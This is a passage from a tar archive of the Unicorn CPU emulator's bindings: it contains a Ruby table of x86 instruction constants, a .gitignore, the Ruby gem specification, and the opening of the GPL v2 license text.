UC_X86_INS_VADDPS = 720 UC_X86_INS_VADDSD = 721 UC_X86_INS_VADDSS = 722 UC_X86_INS_VADDSUBPD = 723 UC_X86_INS_VADDSUBPS = 724 UC_X86_INS_VAESDECLAST = 725 UC_X86_INS_VAESDEC = 726 UC_X86_INS_VAESENCLAST = 727 UC_X86_INS_VAESENC = 728 UC_X86_INS_VAESIMC = 729 UC_X86_INS_VAESKEYGENASSIST = 730 UC_X86_INS_VALIGND = 731 UC_X86_INS_VALIGNQ = 732 UC_X86_INS_VANDNPD = 733 UC_X86_INS_VANDNPS = 734 UC_X86_INS_VANDPD = 735 UC_X86_INS_VANDPS = 736 UC_X86_INS_VBLENDMPD = 737 UC_X86_INS_VBLENDMPS = 738 UC_X86_INS_VBLENDPD = 739 UC_X86_INS_VBLENDPS = 740 UC_X86_INS_VBLENDVPD = 741 UC_X86_INS_VBLENDVPS = 742 UC_X86_INS_VBROADCASTF128 = 743 UC_X86_INS_VBROADCASTI32X4 = 744 UC_X86_INS_VBROADCASTI64X4 = 745 UC_X86_INS_VBROADCASTSD = 746 UC_X86_INS_VBROADCASTSS = 747 UC_X86_INS_VCMPPD = 748 UC_X86_INS_VCMPPS = 749 UC_X86_INS_VCMPSD = 750 UC_X86_INS_VCMPSS = 751 UC_X86_INS_VCOMPRESSPD = 752 UC_X86_INS_VCOMPRESSPS = 753 UC_X86_INS_VCVTDQ2PD = 754 UC_X86_INS_VCVTDQ2PS = 755 UC_X86_INS_VCVTPD2DQX = 756 UC_X86_INS_VCVTPD2DQ = 757 UC_X86_INS_VCVTPD2PSX = 758 UC_X86_INS_VCVTPD2PS = 759 UC_X86_INS_VCVTPD2UDQ = 760 UC_X86_INS_VCVTPH2PS = 761 UC_X86_INS_VCVTPS2DQ = 762 UC_X86_INS_VCVTPS2PD = 763 UC_X86_INS_VCVTPS2PH = 764 UC_X86_INS_VCVTPS2UDQ = 765 UC_X86_INS_VCVTSD2SI = 766 UC_X86_INS_VCVTSD2USI = 767 UC_X86_INS_VCVTSS2SI = 768 UC_X86_INS_VCVTSS2USI = 769 UC_X86_INS_VCVTTPD2DQX = 770 UC_X86_INS_VCVTTPD2DQ = 771 UC_X86_INS_VCVTTPD2UDQ = 772 UC_X86_INS_VCVTTPS2DQ = 773 UC_X86_INS_VCVTTPS2UDQ = 774 UC_X86_INS_VCVTUDQ2PD = 775 UC_X86_INS_VCVTUDQ2PS = 776 UC_X86_INS_VDIVPD = 777 UC_X86_INS_VDIVPS = 778 UC_X86_INS_VDIVSD = 779 UC_X86_INS_VDIVSS = 780 UC_X86_INS_VDPPD = 781 UC_X86_INS_VDPPS = 782 UC_X86_INS_VERR = 783 UC_X86_INS_VERW = 784 UC_X86_INS_VEXP2PD = 785 UC_X86_INS_VEXP2PS = 786 UC_X86_INS_VEXPANDPD = 787 UC_X86_INS_VEXPANDPS = 788 UC_X86_INS_VEXTRACTF128 = 789 UC_X86_INS_VEXTRACTF32X4 = 790 UC_X86_INS_VEXTRACTF64X4 = 791 UC_X86_INS_VEXTRACTI128 = 792 UC_X86_INS_VEXTRACTI32X4 = 793 UC_X86_INS_VEXTRACTI64X4 = 794 UC_X86_INS_VEXTRACTPS = 795 UC_X86_INS_VFMADD132PD = 796 UC_X86_INS_VFMADD132PS = 797 UC_X86_INS_VFMADDPD = 798 UC_X86_INS_VFMADD213PD = 799 UC_X86_INS_VFMADD231PD = 800 UC_X86_INS_VFMADDPS = 801 UC_X86_INS_VFMADD213PS = 802 UC_X86_INS_VFMADD231PS = 803 UC_X86_INS_VFMADDSD = 804 UC_X86_INS_VFMADD213SD = 805 UC_X86_INS_VFMADD132SD = 806 UC_X86_INS_VFMADD231SD = 807 UC_X86_INS_VFMADDSS = 808 UC_X86_INS_VFMADD213SS = 809 UC_X86_INS_VFMADD132SS = 810 UC_X86_INS_VFMADD231SS = 811 UC_X86_INS_VFMADDSUB132PD = 812 UC_X86_INS_VFMADDSUB132PS = 813 UC_X86_INS_VFMADDSUBPD = 814 UC_X86_INS_VFMADDSUB213PD = 815 UC_X86_INS_VFMADDSUB231PD = 816 UC_X86_INS_VFMADDSUBPS = 817 UC_X86_INS_VFMADDSUB213PS = 818 UC_X86_INS_VFMADDSUB231PS = 819 UC_X86_INS_VFMSUB132PD = 820 UC_X86_INS_VFMSUB132PS = 821 UC_X86_INS_VFMSUBADD132PD = 822 UC_X86_INS_VFMSUBADD132PS = 823 UC_X86_INS_VFMSUBADDPD = 824 UC_X86_INS_VFMSUBADD213PD = 825 UC_X86_INS_VFMSUBADD231PD = 826 UC_X86_INS_VFMSUBADDPS = 827 UC_X86_INS_VFMSUBADD213PS = 828 UC_X86_INS_VFMSUBADD231PS = 829 UC_X86_INS_VFMSUBPD = 830 UC_X86_INS_VFMSUB213PD = 831 UC_X86_INS_VFMSUB231PD = 832 UC_X86_INS_VFMSUBPS = 833 UC_X86_INS_VFMSUB213PS = 834 UC_X86_INS_VFMSUB231PS = 835 UC_X86_INS_VFMSUBSD = 836 UC_X86_INS_VFMSUB213SD = 837 UC_X86_INS_VFMSUB132SD = 838 UC_X86_INS_VFMSUB231SD = 839 UC_X86_INS_VFMSUBSS = 840 UC_X86_INS_VFMSUB213SS = 841 UC_X86_INS_VFMSUB132SS = 842 UC_X86_INS_VFMSUB231SS = 843 UC_X86_INS_VFNMADD132PD = 844 UC_X86_INS_VFNMADD132PS = 845 UC_X86_INS_VFNMADDPD = 846 UC_X86_INS_VFNMADD213PD = 847 UC_X86_INS_VFNMADD231PD = 848 UC_X86_INS_VFNMADDPS = 849 UC_X86_INS_VFNMADD213PS = 850 UC_X86_INS_VFNMADD231PS = 851 UC_X86_INS_VFNMADDSD = 852 UC_X86_INS_VFNMADD213SD = 853 UC_X86_INS_VFNMADD132SD = 854 UC_X86_INS_VFNMADD231SD = 855 UC_X86_INS_VFNMADDSS = 856 UC_X86_INS_VFNMADD213SS = 857 UC_X86_INS_VFNMADD132SS = 858 UC_X86_INS_VFNMADD231SS = 859 UC_X86_INS_VFNMSUB132PD = 860 UC_X86_INS_VFNMSUB132PS = 861 UC_X86_INS_VFNMSUBPD = 862 UC_X86_INS_VFNMSUB213PD = 863 UC_X86_INS_VFNMSUB231PD = 864 UC_X86_INS_VFNMSUBPS = 865 UC_X86_INS_VFNMSUB213PS = 866 UC_X86_INS_VFNMSUB231PS = 867 UC_X86_INS_VFNMSUBSD = 868 UC_X86_INS_VFNMSUB213SD = 869 UC_X86_INS_VFNMSUB132SD = 870 UC_X86_INS_VFNMSUB231SD = 871 UC_X86_INS_VFNMSUBSS = 872 UC_X86_INS_VFNMSUB213SS = 873 UC_X86_INS_VFNMSUB132SS = 874 UC_X86_INS_VFNMSUB231SS = 875 UC_X86_INS_VFRCZPD = 876 UC_X86_INS_VFRCZPS = 877 UC_X86_INS_VFRCZSD = 878 UC_X86_INS_VFRCZSS = 879 UC_X86_INS_VORPD = 880 UC_X86_INS_VORPS = 881 UC_X86_INS_VXORPD = 882 UC_X86_INS_VXORPS = 883 UC_X86_INS_VGATHERDPD = 884 UC_X86_INS_VGATHERDPS = 885 UC_X86_INS_VGATHERPF0DPD = 886 UC_X86_INS_VGATHERPF0DPS = 887 UC_X86_INS_VGATHERPF0QPD = 888 UC_X86_INS_VGATHERPF0QPS = 889 UC_X86_INS_VGATHERPF1DPD = 890 UC_X86_INS_VGATHERPF1DPS = 891 UC_X86_INS_VGATHERPF1QPD = 892 UC_X86_INS_VGATHERPF1QPS = 893 UC_X86_INS_VGATHERQPD = 894 UC_X86_INS_VGATHERQPS = 895 UC_X86_INS_VHADDPD = 896 UC_X86_INS_VHADDPS = 897 UC_X86_INS_VHSUBPD = 898 UC_X86_INS_VHSUBPS = 899 UC_X86_INS_VINSERTF128 = 900 UC_X86_INS_VINSERTF32X4 = 901 UC_X86_INS_VINSERTF32X8 = 902 UC_X86_INS_VINSERTF64X2 = 903 UC_X86_INS_VINSERTF64X4 = 904 UC_X86_INS_VINSERTI128 = 905 UC_X86_INS_VINSERTI32X4 = 906 UC_X86_INS_VINSERTI32X8 = 907 UC_X86_INS_VINSERTI64X2 = 908 UC_X86_INS_VINSERTI64X4 = 909 UC_X86_INS_VINSERTPS = 910 UC_X86_INS_VLDDQU = 911 UC_X86_INS_VLDMXCSR = 912 UC_X86_INS_VMASKMOVDQU = 913 UC_X86_INS_VMASKMOVPD = 914 UC_X86_INS_VMASKMOVPS = 915 UC_X86_INS_VMAXPD = 916 UC_X86_INS_VMAXPS = 917 UC_X86_INS_VMAXSD = 918 UC_X86_INS_VMAXSS = 919 UC_X86_INS_VMCALL = 920 UC_X86_INS_VMCLEAR = 921 UC_X86_INS_VMFUNC = 922 UC_X86_INS_VMINPD = 923 UC_X86_INS_VMINPS = 924 UC_X86_INS_VMINSD = 925 UC_X86_INS_VMINSS = 926 UC_X86_INS_VMLAUNCH = 927 UC_X86_INS_VMLOAD = 928 UC_X86_INS_VMMCALL = 929 UC_X86_INS_VMOVQ = 930 UC_X86_INS_VMOVDDUP = 931 UC_X86_INS_VMOVD = 932 UC_X86_INS_VMOVDQA32 = 933 UC_X86_INS_VMOVDQA64 = 934 UC_X86_INS_VMOVDQA = 935 UC_X86_INS_VMOVDQU16 = 936 UC_X86_INS_VMOVDQU32 = 937 UC_X86_INS_VMOVDQU64 = 938 UC_X86_INS_VMOVDQU8 = 939 UC_X86_INS_VMOVDQU = 940 UC_X86_INS_VMOVHLPS = 941 UC_X86_INS_VMOVHPD = 942 UC_X86_INS_VMOVHPS = 943 UC_X86_INS_VMOVLHPS = 944 UC_X86_INS_VMOVLPD = 945 UC_X86_INS_VMOVLPS = 946 UC_X86_INS_VMOVMSKPD = 947 UC_X86_INS_VMOVMSKPS = 948 UC_X86_INS_VMOVNTDQA = 949 UC_X86_INS_VMOVNTDQ = 950 UC_X86_INS_VMOVNTPD = 951 UC_X86_INS_VMOVNTPS = 952 UC_X86_INS_VMOVSD = 953 UC_X86_INS_VMOVSHDUP = 954 UC_X86_INS_VMOVSLDUP = 955 UC_X86_INS_VMOVSS = 956 UC_X86_INS_VMOVUPD = 957 UC_X86_INS_VMOVUPS = 958 UC_X86_INS_VMPSADBW = 959 UC_X86_INS_VMPTRLD = 960 UC_X86_INS_VMPTRST = 961 UC_X86_INS_VMREAD = 962 UC_X86_INS_VMRESUME = 963 UC_X86_INS_VMRUN = 964 UC_X86_INS_VMSAVE = 965 UC_X86_INS_VMULPD = 966 UC_X86_INS_VMULPS = 967 UC_X86_INS_VMULSD = 968 UC_X86_INS_VMULSS = 969 UC_X86_INS_VMWRITE = 970 UC_X86_INS_VMXOFF = 971 UC_X86_INS_VMXON = 972 UC_X86_INS_VPABSB = 973 UC_X86_INS_VPABSD = 974 UC_X86_INS_VPABSQ = 975 UC_X86_INS_VPABSW = 976 UC_X86_INS_VPACKSSDW = 977 UC_X86_INS_VPACKSSWB = 978 UC_X86_INS_VPACKUSDW = 979 UC_X86_INS_VPACKUSWB = 980 UC_X86_INS_VPADDB = 981 UC_X86_INS_VPADDD = 982 UC_X86_INS_VPADDQ = 983 UC_X86_INS_VPADDSB = 984 UC_X86_INS_VPADDSW = 985 UC_X86_INS_VPADDUSB = 986 UC_X86_INS_VPADDUSW = 987 UC_X86_INS_VPADDW = 988 UC_X86_INS_VPALIGNR = 989 UC_X86_INS_VPANDD = 990 UC_X86_INS_VPANDND = 991 UC_X86_INS_VPANDNQ = 992 UC_X86_INS_VPANDN = 993 UC_X86_INS_VPANDQ = 994 UC_X86_INS_VPAND = 995 UC_X86_INS_VPAVGB = 996 UC_X86_INS_VPAVGW = 997 UC_X86_INS_VPBLENDD = 998 UC_X86_INS_VPBLENDMB = 999 UC_X86_INS_VPBLENDMD = 1000 UC_X86_INS_VPBLENDMQ = 1001 UC_X86_INS_VPBLENDMW = 1002 UC_X86_INS_VPBLENDVB = 1003 UC_X86_INS_VPBLENDW = 1004 UC_X86_INS_VPBROADCASTB = 1005 UC_X86_INS_VPBROADCASTD = 1006 UC_X86_INS_VPBROADCASTMB2Q = 1007 UC_X86_INS_VPBROADCASTMW2D = 1008 UC_X86_INS_VPBROADCASTQ = 1009 UC_X86_INS_VPBROADCASTW = 1010 UC_X86_INS_VPCLMULQDQ = 1011 UC_X86_INS_VPCMOV = 1012 UC_X86_INS_VPCMPB = 1013 UC_X86_INS_VPCMPD = 1014 UC_X86_INS_VPCMPEQB = 1015 UC_X86_INS_VPCMPEQD = 1016 UC_X86_INS_VPCMPEQQ = 1017 UC_X86_INS_VPCMPEQW = 1018 UC_X86_INS_VPCMPESTRI = 1019 UC_X86_INS_VPCMPESTRM = 1020 UC_X86_INS_VPCMPGTB = 1021 UC_X86_INS_VPCMPGTD = 1022 UC_X86_INS_VPCMPGTQ = 1023 UC_X86_INS_VPCMPGTW = 1024 UC_X86_INS_VPCMPISTRI = 1025 UC_X86_INS_VPCMPISTRM = 1026 UC_X86_INS_VPCMPQ = 1027 UC_X86_INS_VPCMPUB = 1028 UC_X86_INS_VPCMPUD = 1029 UC_X86_INS_VPCMPUQ = 1030 UC_X86_INS_VPCMPUW = 1031 UC_X86_INS_VPCMPW = 1032 UC_X86_INS_VPCOMB = 1033 UC_X86_INS_VPCOMD = 1034 UC_X86_INS_VPCOMPRESSD = 1035 UC_X86_INS_VPCOMPRESSQ = 1036 UC_X86_INS_VPCOMQ = 1037 UC_X86_INS_VPCOMUB = 1038 UC_X86_INS_VPCOMUD = 1039 UC_X86_INS_VPCOMUQ = 1040 UC_X86_INS_VPCOMUW = 1041 UC_X86_INS_VPCOMW = 1042 UC_X86_INS_VPCONFLICTD = 1043 UC_X86_INS_VPCONFLICTQ = 1044 UC_X86_INS_VPERM2F128 = 1045 UC_X86_INS_VPERM2I128 = 1046 UC_X86_INS_VPERMD = 1047 UC_X86_INS_VPERMI2D = 1048 UC_X86_INS_VPERMI2PD = 1049 UC_X86_INS_VPERMI2PS = 1050 UC_X86_INS_VPERMI2Q = 1051 UC_X86_INS_VPERMIL2PD = 1052 UC_X86_INS_VPERMIL2PS = 1053 UC_X86_INS_VPERMILPD = 1054 UC_X86_INS_VPERMILPS = 1055 UC_X86_INS_VPERMPD = 1056 UC_X86_INS_VPERMPS = 1057 UC_X86_INS_VPERMQ = 1058 UC_X86_INS_VPERMT2D = 1059 UC_X86_INS_VPERMT2PD = 1060 UC_X86_INS_VPERMT2PS = 1061 UC_X86_INS_VPERMT2Q = 1062 UC_X86_INS_VPEXPANDD = 1063 UC_X86_INS_VPEXPANDQ = 1064 UC_X86_INS_VPEXTRB = 1065 UC_X86_INS_VPEXTRD = 1066 UC_X86_INS_VPEXTRQ = 1067 UC_X86_INS_VPEXTRW = 1068 UC_X86_INS_VPGATHERDD = 1069 UC_X86_INS_VPGATHERDQ = 1070 UC_X86_INS_VPGATHERQD = 1071 UC_X86_INS_VPGATHERQQ = 1072 UC_X86_INS_VPHADDBD = 1073 UC_X86_INS_VPHADDBQ = 1074 UC_X86_INS_VPHADDBW = 1075 UC_X86_INS_VPHADDDQ = 1076 UC_X86_INS_VPHADDD = 1077 UC_X86_INS_VPHADDSW = 1078 UC_X86_INS_VPHADDUBD = 1079 UC_X86_INS_VPHADDUBQ = 1080 UC_X86_INS_VPHADDUBW = 1081 UC_X86_INS_VPHADDUDQ = 1082 UC_X86_INS_VPHADDUWD = 1083 UC_X86_INS_VPHADDUWQ = 1084 UC_X86_INS_VPHADDWD = 1085 UC_X86_INS_VPHADDWQ = 1086 UC_X86_INS_VPHADDW = 1087 UC_X86_INS_VPHMINPOSUW = 1088 UC_X86_INS_VPHSUBBW = 1089 UC_X86_INS_VPHSUBDQ = 1090 UC_X86_INS_VPHSUBD = 1091 UC_X86_INS_VPHSUBSW = 1092 UC_X86_INS_VPHSUBWD = 1093 UC_X86_INS_VPHSUBW = 1094 UC_X86_INS_VPINSRB = 1095 UC_X86_INS_VPINSRD = 1096 UC_X86_INS_VPINSRQ = 1097 UC_X86_INS_VPINSRW = 1098 UC_X86_INS_VPLZCNTD = 1099 UC_X86_INS_VPLZCNTQ = 1100 UC_X86_INS_VPMACSDD = 1101 UC_X86_INS_VPMACSDQH = 1102 UC_X86_INS_VPMACSDQL = 1103 UC_X86_INS_VPMACSSDD = 1104 UC_X86_INS_VPMACSSDQH = 1105 UC_X86_INS_VPMACSSDQL = 1106 UC_X86_INS_VPMACSSWD = 1107 UC_X86_INS_VPMACSSWW = 1108 UC_X86_INS_VPMACSWD = 1109 UC_X86_INS_VPMACSWW = 1110 UC_X86_INS_VPMADCSSWD = 1111 UC_X86_INS_VPMADCSWD = 1112 UC_X86_INS_VPMADDUBSW = 1113 UC_X86_INS_VPMADDWD = 1114 UC_X86_INS_VPMASKMOVD = 1115 UC_X86_INS_VPMASKMOVQ = 1116 UC_X86_INS_VPMAXSB = 1117 UC_X86_INS_VPMAXSD = 1118 UC_X86_INS_VPMAXSQ = 1119 UC_X86_INS_VPMAXSW = 1120 UC_X86_INS_VPMAXUB = 1121 UC_X86_INS_VPMAXUD = 1122 UC_X86_INS_VPMAXUQ = 1123 UC_X86_INS_VPMAXUW = 1124 UC_X86_INS_VPMINSB = 1125 UC_X86_INS_VPMINSD = 1126 UC_X86_INS_VPMINSQ = 1127 UC_X86_INS_VPMINSW = 1128 UC_X86_INS_VPMINUB = 1129 UC_X86_INS_VPMINUD = 1130 UC_X86_INS_VPMINUQ = 1131 UC_X86_INS_VPMINUW = 1132 UC_X86_INS_VPMOVDB = 1133 UC_X86_INS_VPMOVDW = 1134 UC_X86_INS_VPMOVM2B = 1135 UC_X86_INS_VPMOVM2D = 1136 UC_X86_INS_VPMOVM2Q = 1137 UC_X86_INS_VPMOVM2W = 1138 UC_X86_INS_VPMOVMSKB = 1139 UC_X86_INS_VPMOVQB = 1140 UC_X86_INS_VPMOVQD = 1141 UC_X86_INS_VPMOVQW = 1142 UC_X86_INS_VPMOVSDB = 1143 UC_X86_INS_VPMOVSDW = 1144 UC_X86_INS_VPMOVSQB = 1145 UC_X86_INS_VPMOVSQD = 1146 UC_X86_INS_VPMOVSQW = 1147 UC_X86_INS_VPMOVSXBD = 1148 UC_X86_INS_VPMOVSXBQ = 1149 UC_X86_INS_VPMOVSXBW = 1150 UC_X86_INS_VPMOVSXDQ = 1151 UC_X86_INS_VPMOVSXWD = 1152 UC_X86_INS_VPMOVSXWQ = 1153 UC_X86_INS_VPMOVUSDB = 1154 UC_X86_INS_VPMOVUSDW = 1155 UC_X86_INS_VPMOVUSQB = 1156 UC_X86_INS_VPMOVUSQD = 1157 UC_X86_INS_VPMOVUSQW = 1158 UC_X86_INS_VPMOVZXBD = 1159 UC_X86_INS_VPMOVZXBQ = 1160 UC_X86_INS_VPMOVZXBW = 1161 UC_X86_INS_VPMOVZXDQ = 1162 UC_X86_INS_VPMOVZXWD = 1163 UC_X86_INS_VPMOVZXWQ = 1164 UC_X86_INS_VPMULDQ = 1165 UC_X86_INS_VPMULHRSW = 1166 UC_X86_INS_VPMULHUW = 1167 UC_X86_INS_VPMULHW = 1168 UC_X86_INS_VPMULLD = 1169 UC_X86_INS_VPMULLQ = 1170 UC_X86_INS_VPMULLW = 1171 UC_X86_INS_VPMULUDQ = 1172 UC_X86_INS_VPORD = 1173 UC_X86_INS_VPORQ = 1174 UC_X86_INS_VPOR = 1175 UC_X86_INS_VPPERM = 1176 UC_X86_INS_VPROTB = 1177 UC_X86_INS_VPROTD = 1178 UC_X86_INS_VPROTQ = 1179 UC_X86_INS_VPROTW = 1180 UC_X86_INS_VPSADBW = 1181 UC_X86_INS_VPSCATTERDD = 1182 UC_X86_INS_VPSCATTERDQ = 1183 UC_X86_INS_VPSCATTERQD = 1184 UC_X86_INS_VPSCATTERQQ = 1185 UC_X86_INS_VPSHAB = 1186 UC_X86_INS_VPSHAD = 1187 UC_X86_INS_VPSHAQ = 1188 UC_X86_INS_VPSHAW = 1189 UC_X86_INS_VPSHLB = 1190 UC_X86_INS_VPSHLD = 1191 UC_X86_INS_VPSHLQ = 1192 UC_X86_INS_VPSHLW = 1193 UC_X86_INS_VPSHUFB = 1194 UC_X86_INS_VPSHUFD = 1195 UC_X86_INS_VPSHUFHW = 1196 UC_X86_INS_VPSHUFLW = 1197 UC_X86_INS_VPSIGNB = 1198 UC_X86_INS_VPSIGND = 1199 UC_X86_INS_VPSIGNW = 1200 UC_X86_INS_VPSLLDQ = 1201 UC_X86_INS_VPSLLD = 1202 UC_X86_INS_VPSLLQ = 1203 UC_X86_INS_VPSLLVD = 1204 UC_X86_INS_VPSLLVQ = 1205 UC_X86_INS_VPSLLW = 1206 UC_X86_INS_VPSRAD = 1207 UC_X86_INS_VPSRAQ = 1208 UC_X86_INS_VPSRAVD = 1209 UC_X86_INS_VPSRAVQ = 1210 UC_X86_INS_VPSRAW = 1211 UC_X86_INS_VPSRLDQ = 1212 UC_X86_INS_VPSRLD = 1213 UC_X86_INS_VPSRLQ = 1214 UC_X86_INS_VPSRLVD = 1215 UC_X86_INS_VPSRLVQ = 1216 UC_X86_INS_VPSRLW = 1217 UC_X86_INS_VPSUBB = 1218 UC_X86_INS_VPSUBD = 1219 UC_X86_INS_VPSUBQ = 1220 UC_X86_INS_VPSUBSB = 1221 UC_X86_INS_VPSUBSW = 1222 UC_X86_INS_VPSUBUSB = 1223 UC_X86_INS_VPSUBUSW = 1224 UC_X86_INS_VPSUBW = 1225 UC_X86_INS_VPTESTMD = 1226 UC_X86_INS_VPTESTMQ = 1227 UC_X86_INS_VPTESTNMD = 1228 UC_X86_INS_VPTESTNMQ = 1229 UC_X86_INS_VPTEST = 1230 UC_X86_INS_VPUNPCKHBW = 1231 UC_X86_INS_VPUNPCKHDQ = 1232 UC_X86_INS_VPUNPCKHQDQ = 1233 UC_X86_INS_VPUNPCKHWD = 1234 UC_X86_INS_VPUNPCKLBW = 1235 UC_X86_INS_VPUNPCKLDQ = 1236 UC_X86_INS_VPUNPCKLQDQ = 1237 UC_X86_INS_VPUNPCKLWD = 1238 UC_X86_INS_VPXORD = 1239 UC_X86_INS_VPXORQ = 1240 UC_X86_INS_VPXOR = 1241 UC_X86_INS_VRCP14PD = 1242 UC_X86_INS_VRCP14PS = 1243 UC_X86_INS_VRCP14SD = 1244 UC_X86_INS_VRCP14SS = 1245 UC_X86_INS_VRCP28PD = 1246 UC_X86_INS_VRCP28PS = 1247 UC_X86_INS_VRCP28SD = 1248 UC_X86_INS_VRCP28SS = 1249 UC_X86_INS_VRCPPS = 1250 UC_X86_INS_VRCPSS = 1251 UC_X86_INS_VRNDSCALEPD = 1252 UC_X86_INS_VRNDSCALEPS = 1253 UC_X86_INS_VRNDSCALESD = 1254 UC_X86_INS_VRNDSCALESS = 1255 UC_X86_INS_VROUNDPD = 1256 UC_X86_INS_VROUNDPS = 1257 UC_X86_INS_VROUNDSD = 1258 UC_X86_INS_VROUNDSS = 1259 UC_X86_INS_VRSQRT14PD = 1260 UC_X86_INS_VRSQRT14PS = 1261 UC_X86_INS_VRSQRT14SD = 1262 UC_X86_INS_VRSQRT14SS = 1263 UC_X86_INS_VRSQRT28PD = 1264 UC_X86_INS_VRSQRT28PS = 1265 UC_X86_INS_VRSQRT28SD = 1266 UC_X86_INS_VRSQRT28SS = 1267 UC_X86_INS_VRSQRTPS = 1268 UC_X86_INS_VRSQRTSS = 1269 UC_X86_INS_VSCATTERDPD = 1270 UC_X86_INS_VSCATTERDPS = 1271 UC_X86_INS_VSCATTERPF0DPD = 1272 UC_X86_INS_VSCATTERPF0DPS = 1273 UC_X86_INS_VSCATTERPF0QPD = 1274 UC_X86_INS_VSCATTERPF0QPS = 1275 UC_X86_INS_VSCATTERPF1DPD = 1276 UC_X86_INS_VSCATTERPF1DPS = 1277 UC_X86_INS_VSCATTERPF1QPD = 1278 UC_X86_INS_VSCATTERPF1QPS = 1279 UC_X86_INS_VSCATTERQPD = 1280 UC_X86_INS_VSCATTERQPS = 1281 UC_X86_INS_VSHUFPD = 1282 UC_X86_INS_VSHUFPS = 1283 UC_X86_INS_VSQRTPD = 1284 UC_X86_INS_VSQRTPS = 1285 UC_X86_INS_VSQRTSD = 1286 UC_X86_INS_VSQRTSS = 1287 UC_X86_INS_VSTMXCSR = 1288 UC_X86_INS_VSUBPD = 1289 UC_X86_INS_VSUBPS = 1290 UC_X86_INS_VSUBSD = 1291 UC_X86_INS_VSUBSS = 1292 UC_X86_INS_VTESTPD = 1293 UC_X86_INS_VTESTPS = 1294 UC_X86_INS_VUNPCKHPD = 1295 UC_X86_INS_VUNPCKHPS = 1296 UC_X86_INS_VUNPCKLPD = 1297 UC_X86_INS_VUNPCKLPS = 1298 UC_X86_INS_VZEROALL = 1299 UC_X86_INS_VZEROUPPER = 1300 UC_X86_INS_WAIT = 1301 UC_X86_INS_WBINVD = 1302 UC_X86_INS_WRFSBASE = 1303 UC_X86_INS_WRGSBASE = 1304 UC_X86_INS_WRMSR = 1305 UC_X86_INS_XABORT = 1306 UC_X86_INS_XACQUIRE = 1307 UC_X86_INS_XBEGIN = 1308 UC_X86_INS_XCHG = 1309 UC_X86_INS_XCRYPTCBC = 1310 UC_X86_INS_XCRYPTCFB = 1311 UC_X86_INS_XCRYPTCTR = 1312 UC_X86_INS_XCRYPTECB = 1313 UC_X86_INS_XCRYPTOFB = 1314 UC_X86_INS_XEND = 1315 UC_X86_INS_XGETBV = 1316 UC_X86_INS_XLATB = 1317 UC_X86_INS_XRELEASE = 1318 UC_X86_INS_XRSTOR = 1319 UC_X86_INS_XRSTOR64 = 1320 UC_X86_INS_XRSTORS = 1321 UC_X86_INS_XRSTORS64 = 1322 UC_X86_INS_XSAVE = 1323 UC_X86_INS_XSAVE64 = 1324 UC_X86_INS_XSAVEC = 1325 UC_X86_INS_XSAVEC64 = 1326 UC_X86_INS_XSAVEOPT = 1327 UC_X86_INS_XSAVEOPT64 = 1328 UC_X86_INS_XSAVES = 1329 UC_X86_INS_XSAVES64 = 1330 UC_X86_INS_XSETBV = 1331 UC_X86_INS_XSHA1 = 1332 UC_X86_INS_XSHA256 = 1333 UC_X86_INS_XSTORE = 1334 UC_X86_INS_XTEST = 1335 UC_X86_INS_FDISI8087_NOP = 1336 UC_X86_INS_FENI8087_NOP = 1337 UC_X86_INS_ENDING = 1338 end����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/ruby/unicorn_gem/pkg/��������������������������������������������������������0000775�0000000�0000000�00000000000�14675241067�0021050�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/ruby/unicorn_gem/pkg/.gitignore����������������������������������������������0000664�0000000�0000000�00000000135�14675241067�0023037�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/.bundle/ /.yardoc /Gemfile.lock /_yardoc/ /coverage/ /doc/ /pkg/ /spec/reports/ /tmp/ *.gem �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/ruby/unicorn_gem/unicorn-engine.gemspec��������������������������������������0000664�0000000�0000000�00000001614�14675241067�0024556�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# coding: utf-8 lib = File.expand_path('../lib', __FILE__) $LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib) require 'unicorn_engine/version' Gem::Specification.new do |spec| spec.name = "unicorn-engine" spec.version = Unicorn::VERSION spec.authors = ["Sascha Schirra"] spec.email = ["sashs@scoding.de"] spec.license = 'GPL-2.0' spec.summary = %q{Ruby binding for Unicorn-Engine} spec.description = %q{Ruby binding for Unicorn-Engine <unicorn-engine.org>} spec.homepage = "https://unicorn-engine.org" spec.files = Dir["lib/unicorn_engine/*.rb"] + Dir["ext/unicorn.c"] + Dir["ext/unicorn.h"] + Dir["ext/types.h"] + Dir["ext/extconf.rb"] spec.require_paths = ["lib","ext"] spec.extensions = ["ext/extconf.rb"] spec.add_development_dependency "bundler", "~> 1.11" spec.add_development_dependency "rake", "~> 10.0" end ��������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/rust/������������������������������������������������������������������������0000775�0000000�0000000�00000000000�14675241067�0015776�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/rust/COPYING�����������������������������������������������������������������0000664�0000000�0000000�00000043110�14675241067�0017030�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������ GNU GENERAL PUBLIC LICENSE Version 2, June 1991 Copyright (C) 1989, 1991 Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA Everyone is permitted to copy and distribute verbatim copies of this license document, but changing it is not allowed. Preamble The licenses for most software are designed to take away your freedom to share and change it. By contrast, the GNU General Public License is intended to guarantee your freedom to share and change free software--to make sure the software is free for all its users. This General Public License applies to most of the Free Software Foundation's software and to any other program whose authors commit to using it. (Some other Free Software Foundation software is covered by the GNU Lesser General Public License instead.) You can apply it to your programs, too. When we speak of free software, we are referring to freedom, not price. Our General Public Licenses are designed to make sure that you have the freedom to distribute copies of free software (and charge for this service if you wish), that you receive source code or can get it if you want it, that you can change the software or use pieces of it in new free programs; and that you know you can do these things. To protect your rights, we need to make restrictions that forbid anyone to deny you these rights or to ask you to surrender the rights. These restrictions translate to certain responsibilities for you if 